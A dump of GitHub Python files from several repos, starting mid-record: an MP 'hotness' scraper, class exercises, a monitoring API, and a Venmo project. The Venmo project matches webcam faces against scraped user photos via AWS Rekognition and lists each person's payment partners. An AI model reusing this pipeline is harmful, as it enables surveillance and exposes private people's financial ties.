open('scraper/out.csv','Ur') as f:\n # reader = csv.reader(f, delimiter=',')\n reader = unicode_csv_reader(f)\n for row in reader:\n print row\n tmp = MemberOfParliament(*row)\n mp_list.append(tmp)\n return mp_list\n\n\nif __name__ == \"__main__\":\n\n db.drop_all()\n db.create_all()\n\n mp_list = parse_scraper_data()\n for mp in mp_list:\n db.session.add(mp)\n\n db.session.commit()" }, { "alpha_fraction": 0.5755868554115295, "alphanum_fraction": 0.577464759349823, "avg_line_length": 26.30769157409668, "blob_id": "e43b5435e94cb6a9d1e071015a391bd45868ad98", "content_id": "ad6f0013354bf11a1d38bf762086d881dc339af4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1065, "license_type": "permissive", "max_line_length": 100, "num_lines": 39, "path": "/backend/models.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "from sqlalchemy import Column, Integer, String\nfrom .views import db\n\n\nclass MemberOfParliament(db.Model):\n\n def __init__(self, url=None, profile_pic=None, name=None, detail=None, party=None, gender=None):\n self.url = url\n self.profile_pic = profile_pic\n self.name = name\n self.detail = detail\n self.party = party\n self.gender = gender\n if url:\n self.key = url.split('/')[-2]\n return\n\n __tablename__ = 'members'\n\n # columns\n pk = Column(Integer, primary_key=True)\n name = Column(String)\n gender = Column(String)\n url = Column(String)\n party = Column(String)\n profile_pic = Column(String)\n key = Column(String)\n score = Column(Integer, default=0)\n\n def __repr__(self):\n return \"<MemberOfParliament(pk='%s', name='%s')>\" % (\n str(self.pk), str(self.name))\n\n def as_dict(self):\n tmp = {c.name: getattr(self, c.name) for c in self.__table__.columns}\n del tmp['pk']\n del tmp['key']\n tmp['id'] = self.key\n return tmp\n" }, { "alpha_fraction": 0.5551871061325073, "alphanum_fraction": 0.5589767694473267, "avg_line_length": 25.658227920532227, "blob_id": "63a6ba078b85c5d0d0cd128998e39a8128f69c4c", "content_id": 
"07e7b3fdcf625e6c9334b18f26cb5250ad29cba5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2111, "license_type": "permissive", "max_line_length": 124, "num_lines": 79, "path": "/scraper/scrape.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "import requests\nimport sys\nimport csv\nfrom bs4 import BeautifulSoup \nfrom urlparse import urljoin\n\nna_url = \"http://www.pa.org.za/organisation/national-assembly/people/\"\n\ndef guess_gender(name):\n if name.startswith(\"Mrs\") or name.startswith(\"Ms\"):\n return \"F\"\n elif name.startswith(\"Mr\"):\n return \"M\"\n else:\n print name\n print \"(M)ale or (F)emale?\"\n print \"\"\n val = raw_input()\n if val.lower() == \"m\":\n return \"M\"\n elif val.lower() == \"f\":\n return \"F\"\n return \"U\"\n\ndef list_pages():\n list_url = na_url\n while True:\n html = requests.get(list_url).content\n soup = BeautifulSoup(html)\n for item in soup.select(\".person-list-item a\"):\n url = item[\"href\"]\n if \"person\" in url:\n yield urljoin(na_url, url)\n\n next = soup.select(\"a.next\")\n if next:\n list_url = urljoin(na_url, next[0][\"href\"])\n else:\n break\n\ndef detail_page(url):\n html = requests.get(url).content\n soup = BeautifulSoup(html)\n\n profile_pic = soup.select(\"div.profile-pic img\")\n if profile_pic:\n profile_pic = urljoin(na_url, profile_pic[0][\"src\"])\n\n name = soup.select(\"div.title-space h1\")\n if name:\n name = name[0].text\n\n \n position_title = soup.select(\"span.position-title\")\n if position_title:\n position_title = position_title[0].text\n \n details = soup.select(\"div.constituency-party a\")\n party = details[0].text\n\n return {\n \"url\" : url,\n \"profile_pic\" : profile_pic,\n \"name\" : name,\n \"position_title\" : position_title,\n \"party\" : party,\n \"gender\" : guess_gender(name),\n }\n\nwriter = csv.writer(sys.stdout)\nwriter.writerow([\"url\", \"pic_url\", \"name\", \"position/title\", \"party\", \"gender\"])\ndef _(s):\n return s.encode(\"utf8\")\n\nfor url in list_pages():\n data = detail_page(url)\n writer.writerow([\n data[\"url\"], _(data[\"profile_pic\"]), _(data[\"name\"]), _(data[\"position_title\"]), _(data[\"party\"]), _(data[\"gender\"])\n ])\n \n" }, { "alpha_fraction": 0.7074829936027527, "alphanum_fraction": 0.7074829936027527, "avg_line_length": 23.66666603088379, "blob_id": "d317a30a12243dc94b1d82977e02d3077a375a22", "content_id": "766b492a91020225f0f28b88b1c113520d8ed05a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "permissive", "max_line_length": 63, "num_lines": 6, "path": "/config/production/config.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "\"\"\"\nAdd any config variables here that don't have to be private.\n\"\"\"\n\nDEBUG = False\nSQLALCHEMY_DATABASE_URI = 'sqlite:///../instance/pa-hotness.db'" } ]
8
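A note on the OpenUpSA/pa-hotness record above: its scrape.py walks the member listing by following the 'a.next' pagination link until it disappears. A minimal Python 3 sketch of that same follow-the-next-link pattern, assuming requests and beautifulsoup4 are installed; the start URL is the one hard-coded in scrape.py, everything else is illustrative:

import requests
from urllib.parse import urljoin
from bs4 import BeautifulSoup

def iter_member_urls(start_url="http://www.pa.org.za/organisation/national-assembly/people/"):
    url = start_url
    while url:
        soup = BeautifulSoup(requests.get(url).content, "html.parser")
        # Yield each person's detail-page URL, as list_pages() does in the record.
        for a in soup.select(".person-list-item a"):
            if "person" in a["href"]:
                yield urljoin(start_url, a["href"])
        # Follow the 'next' pagination link until there is none.
        nxt = soup.select_one("a.next")
        url = urljoin(start_url, nxt["href"]) if nxt else None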
Yiiiii-tao/class
https://github.com/Yiiiii-tao/class
61c4f370f650fc0d718381ce20c56ce8d9a98e6a
9064877a840c27c0b0bcd46a6788452da8595bc1
3dc1e6a8821c06f6e33477ca7d542daf5fc8e856
refs/heads/master
2020-09-19T23:16:57.760241
2019-11-27T01:55:20
2019-11-27T01:55:20
224,321,075
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.3977011442184448, "alphanum_fraction": 0.4850574731826782, "avg_line_length": 23.22222137451172, "blob_id": "7435ecb202553b9c563559516890fdc0dbb02aa8", "content_id": "27e358f749104345a29f520ef0a75036df5cb904", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/class6.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import numpy as np\ndef test():\n a = np.arange(15).reshape(3, 5)\n # a=np.array([[1,2,3],[4,5,6]],dtype=np.int16)\n # a=np.linspace(0,10,11)\n # a=np.zeros((3,5))#[[1,2,3]] != [1,2,3]\n # a=np.ones((3,5))\n # a=np.eye(3)*2\n # a=np.diag([2,3,4])\n # print(type(a))\n print(a)\n # print(a.shape,a.size,a.itemsize)\n # print(a*10+4)\n print(a[:2,1::2])\ndef main():\n test()\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6004390716552734, "alphanum_fraction": 0.6048298478126526, "avg_line_length": 25.02857208251953, "blob_id": "cc2dfa28710c8c0eb3b226dcae6321f2806abff5", "content_id": "781c52486446698e39cfef14416353490525a2ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 927, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/urllib1.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "\n# -*- coding:utf-8 -*-\n#获取并打印google首页的html\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport json\nfrom urllib.parse import urlparse\nimport time\n# print(bs)\n# print(html)\ndef getdata(r='http://www.nufe.edu.cn/'):\n response = urllib.request.urlopen(r)\n html = response.read()\n bs = BeautifulSoup(html, \"html.parser\")\ndef getinfo(bs):\n la = bs.find_all('a')\n res=[]\n for a in la:\n if len(a.text)>0 and a.get('href') and len(a.get('href'))>2:\n res.append(a.get('href'))\n return res\ndef save(url,res):\n dest_str=urlparse(url)\n with open('a.json','w') as f:\n json.dump(res,f)\ndef main():\n response = urllib.request.urlopen('http://www.nufe.edu.cn/')\n html = response.read()\n bs = BeautifulSoup(html, \"html.parser\")\n res=getinfo(bs)\n for r in res:\n if r.startswith('http'):\n\n print(r)\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.7738693356513977, "alphanum_fraction": 0.7839195728302002, "avg_line_length": 30.421052932739258, "blob_id": "8d101e83359d7584516c8eff5c9fb7cc09b0f1da", "content_id": "be352356ae590de36b72dab48adbbcf40fa7dada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/helloworld/class3test.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import os\nfrom PIL import Image\nfrom skimage import exposure\nimport numpy as np\nimport matplotlib.pyplot as plt\nimg = Image.open('/home/vincent/Pictures/work/Unequalized_Hawkes_Bay_NZ.jpg')\nimg = np.array(img)\nimg_eq = exposure.equalize_hist(img)\nimg_adapteq = exposure.equalize_adapthist(img, clip_limit=0.04)\nplt.figure(0)\nplt.imshow(img)\nplt.title('low contrast image')\nplt.figure(1)\nplt.imshow(img_eq)\nplt.title('high constrast image using normal histogram equalization')\nplt.figure(2)\nplt.imshow(img_adapteq)\nplt.title('high constract image using adaptive histogram euqalization')\nplt.show()\n" }, { "alpha_fraction": 0.41564247012138367, "alphanum_fraction": 0.4569832384586334, "avg_line_length": 20.85365867614746, 
"blob_id": "f6c58999ed527eeb19e5e867a7a7738bd605d558", "content_id": "f69712023763c2ad176c0f9cdde4ade08970c98b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 907, "license_type": "no_license", "max_line_length": 55, "num_lines": 41, "path": "/class2.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import os\nimport class1\ndef f(x):\n return x*x\ndef fn(x,y):\n return x*10+y\ndef english(str):\n return str.capitalize()\ndef test():\n # print('list slice')\n # L=[0,1,2,3,4,5,6,7]\n # print(L)\n # for i in range(8):\n # L.append(i)\n # print(L)\n # print(L[0],L[4:6])\n # s='hello world'\n # s='南京财经大学'\n # print(s[0:6:2])\n # m={'a':10,'b':5}\n # for i in sorted(m):\n # print(i,m[i])\n # d={'x':'A','Y':'B','z':'C'}\n # l=['HELLO','WORLD','ibm','APPLe']\n # d1=[s.lower() for s in l]\n # print(l,d1)\n # d2={}\n # for s in d:\n # d2[s]=d[s].lower()\n # print(d,d2)\n # r=map(f,[1,2,3,5,6,4])\n # for i in r:\n # print(i)\n # print(reduce(fn,[1,2,3,4,5]))\n result=map(english,['HELLO','WORLD','ibm','APPLe'])\n for i in result:\n print(i)\ndef main(*args,**kw):\n test()\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5779069662094116, "alphanum_fraction": 0.5918604731559753, "avg_line_length": 25.90625, "blob_id": "ab827de55843b341d7c6ba68faa1311b398b82c4", "content_id": "a6bdaa97c6d26eacba2a71030d8a285233837209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 960, "license_type": "no_license", "max_line_length": 65, "num_lines": 32, "path": "/class4.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "# import cv2\n# import tkinter\nimport selenium\n# import socket\n# s = socket.socket() # 创建 socket 对象\n# host = socket.gethostname() # 获取本地主机名\n# port = 12345 # 设置端口\n# s.bind((host, port)) # 绑定端口\n# s.listen(5) # 等待客户端连接\n# while True:\n# c, addr = s.accept() # 建立客户端连接\n# print('连接地址',addr)\n# data='欢迎访问菜鸟教程!'\n# byt=data.encode()\n# c.send(byt)\n# c.close() # 关闭连接\nimport urllib1.request\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\ndef test():\n # with urllib.request.urlopen('http://home.baidu.com/') as f:\n # #print(f.read(300))\n # soup=BeautifulSoup(f,'html.parser')\n # print(soup.title)\n # print(soup.title.string)\n # for a in(soup.find_all('a')):\n # print(a.text,a.get('href'))\n browser=webdriver.Chrome()\ndef main():\n test()\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.5319767594337463, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 18.13888931274414, "blob_id": "5f81c4abfdf2e5bc5e6b4ece893ebfb311070d8e", "content_id": "adb1dbb6672bc633e4f5c3e3f37efed45b234f34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 734, "license_type": "no_license", "max_line_length": 32, "num_lines": 36, "path": "/class3.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import sys\nimport json\nimport types\nimport PIL\nclass student:\n _s=10\n name='a'\n def __init__(self,a):\n self.name=a\n def gets(self):\n return self._s\n def getname(self):\n return self.name\ndef test():\n # print(dir(sys))\n # print(sys.__doc__)\n # print(sys.path)\n # print(sys.argv)\n # print(sys.__name__)\n # print(dir(types))\n # print(isinstance('a',str))\n m=student('a')\n print(m.name)\n print(m.getname())\n print(m.gets())\n m = student('b')\n print(m.name)\n print(m.getname())\n print(m.gets())\ndef main(*args,**kw):\n test()\n 
'''\n This program calls the main() function when it is run directly; it does not execute when imported by another program\n '''\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.4638989269733429, "alphanum_fraction": 0.590252697467804, "avg_line_length": 38.64285659790039, "blob_id": "2c85372c8a7df553f4ae4e1f2a0a32b5067a7293", "content_id": "e65777593520137a1a1f2f1c1b711271ec7d530e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 694, "license_type": "no_license", "max_line_length": 94, "num_lines": 14, "path": "/helloworld/1.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "# import the bar chart type - Bar\nfrom pyecharts import Bar\n# set the column names\ncolumns = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n# set the data\ndata1 = [2.0, 4.9, 7.0, 23.2, 25.6, 76.7, 135.6, 162.2, 32.6, 20.0, 6.4, 3.3]\ndata2 = [2.6, 5.9, 9.0, 26.4, 28.7, 70.7, 175.6, 182.2, 48.7, 18.8, 6.0, 2.3]\n# set the bar chart's main title and subtitle\nbar = Bar(\"Bar chart\", \"Annual precipitation and evaporation\")\n# add the bar chart's data and configuration options\nbar.add(\"Precipitation\", columns, data1, mark_line=[\"average\"], mark_point=[\"max\", \"min\"])\nbar.add(\"Evaporation\", columns, data2, mark_line=[\"average\"], mark_point=[\"max\", \"min\"])\n# generate a local file (defaults to an .html file)\nbar.render()" } ]
7
melice/edwin
https://github.com/melice/edwin
0fd3dc51d5ce30898c0eb419bcd7a4a5057ea6bf
ea66be2813cc9eadfa413ee27c7e0407ad593424
68f1f8f09e39e7fcf09166ef4d38e542db984f80
refs/heads/master
2020-12-25T13:33:14.848504
2014-08-09T09:14:09
2014-08-09T09:14:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6343702077865601, "alphanum_fraction": 0.6491585969924927, "avg_line_length": 29.640625, "blob_id": "8058df36e901a33895fb61de8494d18d5f86cff0", "content_id": "587ca5cc009a89952a3084d3590facc7bd653102", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1961, "license_type": "permissive", "max_line_length": 86, "num_lines": 64, "path": "/edwinAgent/common/api_helper.py", "repo_name": "melice/edwin", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n'''\n\n'''\n\n\nfrom __future__ import absolute_import\nimport json\nimport urllib2\nfrom . import conf\nimport logging\n\n\ndef _updateResult(check_itm, check_value, status, detail_msg, notification_msg=''):\n logger = logging.getLogger(__name__)\n logger.info(\"Begin to update checking result via web API.\")\n\n data = {'status': status,\n 'value': check_value,\n 'detail_msg': detail_msg,\n 'notification_msg': notification_msg\n }\n data_json = json.dumps(data)\n url = \"%s/api/v1.0/checks/%s\" % (conf.web_url, check_itm)\n req = urllib2.Request(url, data_json, {'Content-Type': 'application/json'})\n\n f = urllib2.urlopen(req)\n httpCodes = f.getcode()\n responseStr = f.read()\n f.close()\n json_data = json.loads(responseStr)\n echo_msg = json_data['echo_msg']\n successful = httpCodes in [200, 201, 202]\n return (successful, echo_msg)\n\n\ndef updateNonnumericalResult(check_itm, status, detail_msg, notification_msg=''):\n check_value = 0\n return _updateResult(check_itm, check_value, status, detail_msg, notification_msg)\n\n\ndef updateNumericalResult(check_itm, check_value, detail_msg, notification_msg=''):\n status = \"\"\n return _updateResult(check_itm, check_value, status, detail_msg, notification_msg)\n\n\ndef registerException(check_itm, exception_msg):\n logger = logging.getLogger(__name__)\n logger.info(\"Begin to register checking exception via web API.\")\n\n data = {\n 'exception_msg': exception_msg\n }\n data_json = json.dumps(data)\n url = \"%s/api/v1.0/exceptions/%s\" % (conf.web_url, check_itm)\n req = urllib2.Request(url, data_json, {'Content-Type': 'application/json'})\n f = urllib2.urlopen(req)\n httpCodes = f.getcode()\n responseStr = f.read()\n f.close()\n json_data = json.loads(responseStr)\n echo_msg = json_data['echo_msg']\n successful = httpCodes in [200, 201, 202]\n return (successful, echo_msg)\n" }, { "alpha_fraction": 0.602495551109314, "alphanum_fraction": 0.6228673458099365, "avg_line_length": 34.0625, "blob_id": "52be26fb47523bcde1b82551753c6f1b3e359b12", "content_id": "e0ddc0ced093fc78696860f2361fdf548b752204", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3927, "license_type": "permissive", "max_line_length": 130, "num_lines": 112, "path": "/edwinServer/web/app/api.py", "repo_name": "melice/edwin", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n'''\nCreated on 2014-2-10\n\n'''\nfrom __future__ import absolute_import\nfrom flask import Blueprint, abort, request, flash, jsonify\nfrom ...common.job_state_updater import JobStateUpdater\n\n\nmod = Blueprint('checks', __name__) # register the users blueprint module\n\n\n'''\n checkResult_json = {\n 'status': 'NORMAL', \n 'value': 100\n 'detail_msg':'Some detailed message' \n 'notification_msg': 'some detailed message for email notification'\n }\n \n exceptionInfo_json = {\n 'exception_msg': 'Some exception message'\n } \n\n'''\n\n\[email 
protected](\"/api/v1.0/checks/<check_itm_code>\", methods=('POST', 'GET'))\ndef saveCheckResultAPI_view(check_itm_code):\n state_updater = JobStateUpdater(check_itm_code)\n if state_updater.isUndefinedCheckItem():\n flash('Undefined check item %s.' % check_itm_code, 'error')\n abort(404) # page not found\n\n if not request.json:\n abort(400) # bad request\n\n if state_updater.resultShouldBeNumerical():\n if not 'value' in request.json:\n abort(400) # bad request\n else:\n value = request.json['value']\n\n detail_msg = request.json.get('detail_msg', \"\")\n notification_msg = request.json.get('notification_msg', \"\")\n state_updater.updateNumericalResult(value, detail_msg, notification_msg)\n else:\n if not request.json or not 'status' in request.json:\n abort(400) # bad request\n else:\n status = request.json['status']\n detail_msg = request.json.get('detail_msg', \"\")\n notification_msg = request.json.get('notification_msg', \"\")\n state_updater.updateNonnumericalResult(status, detail_msg, notification_msg)\n\n return jsonify({'echo_msg': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/exceptions/<check_itm_code>\", methods=('POST', 'GET'))\ndef registerExceptionAPI_view(check_itm_code):\n state_updater = JobStateUpdater(check_itm_code)\n if state_updater.isUndefinedCheckItem():\n # abort(404) # check item not found\n return jsonify({'echo_msg': 'Check item %s not found' % (check_itm_code)}), 400\n\n if not request.json:\n # abort(400) # bad request\n return jsonify({'echo_msg': 'Request json data not found'}), 400\n\n if not 'exception_msg' in request.json:\n # abort(400) # bad request\n return jsonify({'echo_msg': 'No exception_msg in the request json data'}), 400\n else:\n exception_msg = request.json.get('exception_msg', \"\")\n state_updater.registerCheckingException(exception_msg)\n\n return jsonify({'echo_msg': 'successful'}), 201\n\n\n#-----------------------------------------\n# test api below\n#-----------------------------------------\n\n\[email protected](\"/api/v1.0/test/simple\", methods=('GET', 'POST'))\ndef test_simple_view():\n return jsonify({'request.method': request.method, 'save_status': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/test/str_arg/<check_itm_code>\", methods=('POST', 'GET'))\ndef test_str_argument_view(check_itm_code):\n abort(400)\n return jsonify({'request.method': request.method, 'item': check_itm_code, 'save_status': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/test/int_arg/<int:seq_no>\", methods=('POST', 'GET'))\ndef test_int_argument_view(seq_no):\n return jsonify({'request.method': request.method, 'seq_no': seq_no, 'save_status': 'successful'}), 201\n\n\[email protected](\"/api/v1.0/test/json_post/<check_itm_code>\", methods=('POST', 'GET'))\ndef test_json_post_view(check_itm_code):\n if not request.json:\n abort(400) # bad request\n\n if not 'value' in request.json:\n abort(400) # bad request\n\n value = request.json['value']\n detail_msg = request.json.get('detail_msg', \"\") # if detail_msg is not set, use empty\n return jsonify({'request.method': request.method, 'value': value, 'detail_msg': detail_msg, 'save_status': 'successful'}), 201\n" } ]
2
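api_helper.py and api.py in the melice/edwin record above define a small JSON-over-HTTP contract: the agent POSTs {'status', 'value', 'detail_msg', 'notification_msg'} to /api/v1.0/checks/<check_itm_code> and reads back 'echo_msg'. A minimal Python 3 client sketch of the same call; the base URL and the check item code 'demo_check' are hypothetical placeholders, not values from the record:

import json
import urllib.request

def update_check(base_url, check_itm, status, detail_msg=""):
    # Same payload shape saveCheckResultAPI_view expects for a non-numerical check.
    payload = json.dumps({"status": status, "detail_msg": detail_msg}).encode("utf-8")
    req = urllib.request.Request(
        "%s/api/v1.0/checks/%s" % (base_url, check_itm),
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.getcode(), json.load(resp)["echo_msg"]

# Hypothetical usage; 'demo_check' must be a defined check item or the API aborts with 404.
# print(update_check("http://localhost:5000", "demo_check", "NORMAL", "all good"))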
jbroig/udacity_machine_learning
https://github.com/jbroig/udacity_machine_learning
d9573b60095b21ac3d050164d42ff908d2461779
392e1f54b5d940002eaedb463a5affa48bed247e
daca7de4fda7cc2539d1a5ce517b68e2f466e611
refs/heads/master
2021-04-12T12:10:03.761164
2018-03-22T16:29:08
2018-03-22T16:29:08
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6607387065887451, "alphanum_fraction": 0.6730506420135498, "avg_line_length": 20.8358211517334, "blob_id": "2fedf2f0afae0fcc1336aa2e1cabaf29f82879a6", "content_id": "57e637415f2f1ce0a5deeb540eb3df17d820fb45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 81, "num_lines": 67, "path": "/datasets_questions/explore_enron_data.py", "repo_name": "jbroig/udacity_machine_learning", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\" \n Starter code for exploring the Enron dataset (emails + finances);\n loads up the dataset (pickled dict of dicts).\n\n The dataset has the form:\n enron_data[\"LASTNAME FIRSTNAME MIDDLEINITIAL\"] = { features_dict }\n\n {features_dict} is a dictionary of features associated with that person.\n You should explore features_dict as part of the mini-project,\n but here's an example to get you started:\n\n enron_data[\"SKILLING JEFFREY K\"][\"bonus\"] = 5600000\n \n\"\"\"\n\nimport pickle\n\nenron_data = pickle.load(open(\"../final_project/final_project_dataset.pkl\", \"r\"))\n\n#Persons on the enron dataset\nprint len(enron_data)\n\n#Features\nprint len(enron_data.values()[0])\n\n#POI's\ncount = 0\n\nfor i in enron_data.values():\n if i['poi'] == 1:\n count +=1\n\nprint count\n\n#Query the dataset 1\na = enron_data['PRENTICE JAMES']['total_stock_value']\nprint a\n\n#Query the dataset 2\nb = enron_data['COLWELL WESLEY']['from_this_person_to_poi']\nprint b \n\n#Query the dataset 3\nc = enron_data['SKILLING JEFFREY K']['exercised_stock_options']\nprint c\n\n#Follow the money\n\nnames = ['SKILLING JEFFREY K', 'FASTOW ANDREW S', 'LAY KENNETH L']\nfor i in names:\n print enron_data[i]['total_payments']\n\n#Dealing with unfilled features\n\nquantified_salary = 0\nemail_address = 0\nfor i in enron_data.values():\n if i['salary'] != 'NaN':\n quantified_salary += 1\n\n if i['email_address'] != 'NaN':\n email_address += 1\n \nprint quantified_salary\nprint email_address" } ]
1
adam-lim1/venmo-analysis
https://github.com/adam-lim1/venmo-analysis
c72da6bc25a94d490a775dd08fa91504d2c6634d
7adee774720edcbfdc88d09ea39eb88444fb110a
c5043357c4052ed621b2143b8fbde0cfed5b538d
refs/heads/master
2021-08-05T23:02:10.634587
2017-11-02T01:31:28
2017-11-02T01:31:28
109,198,922
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6335051655769348, "alphanum_fraction": 0.6407216787338257, "avg_line_length": 31.74576187133789, "blob_id": "c3fc847e84be6334e998366a7de3b43db3e7c59f", "content_id": "1c435437707ad8f3ddc3ad7f8d9d7fbf1cbe4eb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1940, "license_type": "no_license", "max_line_length": 164, "num_lines": 59, "path": "/FacialRecognition.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\n\nget_ipython().magic('matplotlib inline')\n\nimport pandas as pd\nimport pickle\n\n# PACKAGES FOR WEBCAM IMAGES\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\n# Packages for AWS\nimport boto3\n\nclient = boto3.client('rekognition')\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n# ************************** Establish AWS Database **************************\n\n# Read pickle file for list of Venmo users\nall_user_pics_df = pickle.load(open( '{}/Data/all_user_pics_df.pkl'.format(base_path), \"rb\" ))\n\n# drop index if needed\ntry:\n all_user_pics_df = all_user_pics_df.drop('index',axis=1)\nexcept:\n pass\n\nall_user_pics_df = all_user_pics_df.sort_values('username')\n\n\n# Create AWS collection of faces\n\nif 'venmo_users' not in client.list_collections()['CollectionIds']:\n try:\n response = client.create_collection(CollectionId='venmo_users')\n print('venmo_users collection created')\n print(response)\n except:\n print('Error - collection could not be created')\nelse:\n print('venmo_users collection already exists')\n\n\n# Add images to AWS Collection\nfor row in range(all_user_pics_df.shape[0]):\n try: # Get bytes from image\n with open('{}/Images/{}.jpg'.format(base_path, all_user_pics_df['username'].iloc[row])\n , 'rb') as target_image:\n target_bytes = target_image.read()\n target_image.close()\n \n #Add bytes to AWS collection with external ID of username\n response = client.index_faces(CollectionId='venmo_users', Image={'Bytes':target_bytes}, ExternalImageId='{}'.format(all_user_pics_df['username'].iloc[row]))\n print('{} successfully added'.format(all_user_pics_df['username'].iloc[row]))\n except:\n print('No image added for {}'.format(all_user_pics_df['username'].iloc[row]))\n " }, { "alpha_fraction": 0.6618257164955139, "alphanum_fraction": 0.6716064214706421, "avg_line_length": 33.09090805053711, "blob_id": "cd7f41f12712266f3408e72e5e652c7af05c2efb", "content_id": "74517a8a3f68c5da054221b961c227442af63717", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3374, "license_type": "no_license", "max_line_length": 132, "num_lines": 99, "path": "/Query.py", "repo_name": "adam-lim1/venmo-analysis", "src_encoding": "UTF-8", "text": "# ************************** Initialization **************************\nget_ipython().magic('matplotlib inline')\n\nimport pandas as pd\nimport pickle\n\n# PACKAGES FOR WEBCAM IMAGES\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\n# PACKAGES FOR AWS\nimport boto3\n\n# TOPIC MODELING PACKAGES\nimport gensim \nfrom gensim import corpora\n\nbase_path = 'C:/Users/290002943/Documents/Personal/Venmo Project'\n\n# Define function to take picture from webcam\ncamera_port = 0 \nramp_frames = 30 \n\ndef take_pic():\n camera = cv2.VideoCapture(camera_port)\n for i in range(ramp_frames):\n temp = 
camera.read()\n retval, camera_capture = camera.read() # Get image\n filename = '{}/Images/webcam_capture.jpg'.format(base_path)\n cv2.imwrite(filename,camera_capture)\n del(camera)\n \n img=mpimg.imread('{}/Images/webcam_capture.jpg'.format(base_path))\n plt.axis('off')\n imgplot = plt.imshow(img)\n return('Picture captured')\n\n\n# Read in transaction dataframe\ntrans_subset = pickle.load(open( '{}/Data/trans_subset.pkl'.format(base_path), \"rb\" ))\n\nclient = boto3.client('rekognition')\n\n# ************************** Get image from webcam **************************\ntake_pic()\n\n\n# ************************** Search AWS database for match **************************\n\nwith open('{}/Images/webcam_capture.jpg'.format(base_path), 'rb') as target_image:\n target_bytes = target_image.read()\n target_image.close()\n\nresponse = client.search_faces_by_image(CollectionId='venmo_users', Image={'Bytes':target_bytes}, MaxFaces=1, FaceMatchThreshold=75)\n\n\nif len(response['FaceMatches'])==0:\n print('Face not found in database')\nelse:\n image_id = (response['FaceMatches'])[0]['Face']['ExternalImageId']\n print('Face found in database as', image_id)\n img=mpimg.imread('{}/Images/{}.jpg'.format(base_path, image_id))\n plt.axis('off')\n imgplot = plt.imshow(img)\n\n# ************************** Get insights on user **************************\n\nactor_transactions = trans_subset.query('actor_username == \"{}\" or target_username==\"{}\"'.format(image_id, image_id))\nactor_transactions\n\nsender = actor_transactions[actor_transactions['actor_username']!='{}'.format(image_id)]['actor_username'].mode().loc[0]\nsend_count = actor_transactions[actor_transactions['actor_username']=='{}'.format(sender)].shape[0]\nprint('{} was paid the most number of times by {} ({})'.format(image_id, sender, send_count))\n\nreciever = actor_transactions[actor_transactions['target_username']!='{}'.format(image_id)]['target_username'].mode().loc[0]\nrecieve_count = actor_transactions[actor_transactions['target_username']=='{}'.format(sender)].shape[0]\nprint('{} paid {} the most number of times ({})'.format(image_id, reciever, recieve_count))\n\n\n# ### Topic Modeling\n\ntext_doc = 